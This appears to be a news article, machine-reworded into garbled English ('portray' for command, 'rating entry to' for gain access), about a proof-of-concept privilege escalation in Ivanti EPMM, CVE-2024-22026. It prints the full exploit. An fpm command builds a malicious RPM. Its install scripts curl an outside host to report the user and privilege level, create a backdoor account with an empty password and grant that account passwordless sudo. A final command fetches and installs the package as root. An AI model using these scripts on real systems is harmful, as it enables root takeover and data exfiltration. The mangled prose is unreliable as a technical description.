PoC Exploit Released for Ivanti EPMM MobileIron Core
A newly disclosed vulnerability, CVE-2024-22026, has been demonstrate in Ivanti Endpoint Supervisor Cell (EPMM), formerly MobileIron Core.
This vulnerability permits a local attacker to contain root rating entry to to affected programs.
The severity of this vulnerability is at demonstrate undetermined.
CVE-2024-22026: Local Privilege Escalation Vulnerability
The assault vector for CVE-2024-22026 is local, which scheme the attacker need to personal local rating entry to to the system to take good thing concerning the vulnerability, as per reports by Github.
Once exploited, the attacker can rating root rating entry to, which offers plump keep an eye on over the system and could doubtlessly lead to major safety breaches.
Discovery
The machine makes use of the next portray as a low-privilege person to rating and set up RPM packages:
install rpm url
This portray is a CLI wrapper for the next to happen, which runs as root:
/bin/rpm -Uvh *.rpm
It’s conceivable to bustle any RPM bundle for the reason that RPM portray itself doesn’t examine signatures or block URLs. An attacker can make a false RPM bundle and ship it to the machine, making it inclined.
Exploitation PoCCreating the Malicious RPM
The next portray is extinct to make a malicious RPM bundle:
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .
Preinstall Script (preinstall.sh)
#!/bin/sh curl -O http:///poc exit 0 Postinstall Script (postinstall.sh) #!/bin/sh set -e # Enable strict error checking # Report back current user and privilege level CURRENT_USER=$(whoami | base64) PRIV_LEVEL=$(id -u | base64) curl http:///poc?user=$CURRENT_USER curl http:///poc?priv=$PRIV_LEVEL # Create a new root user if ! useradd -s /bin/sh -m exploit-poc; then echo "Failed to add user 'exploit-poc'" >&2 exit 1 fi echo "exploit-poc:" | chpasswd # Grant root privileges if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then echo "Failed to modify sudoers file" >&2 exit 1 fi exit 0
Running the CLI Whine to Procure the RPM: To plot shut just correct thing concerning the flaw, the attacker would use the code below in the CLI to rating the malicious RPM and set up it:
install rpm url http:///ivanti-privesc-13.37-1.i386.rpm
Ivanti has released patches to address this vulnerability in variations 12.1.0.0, 12.0.0.0, and 11.12.0.1.
It’s suggested that users substitute these variations to mitigate the threat related to CVE-2024-22026.
Source credit : cybersecuritynews.com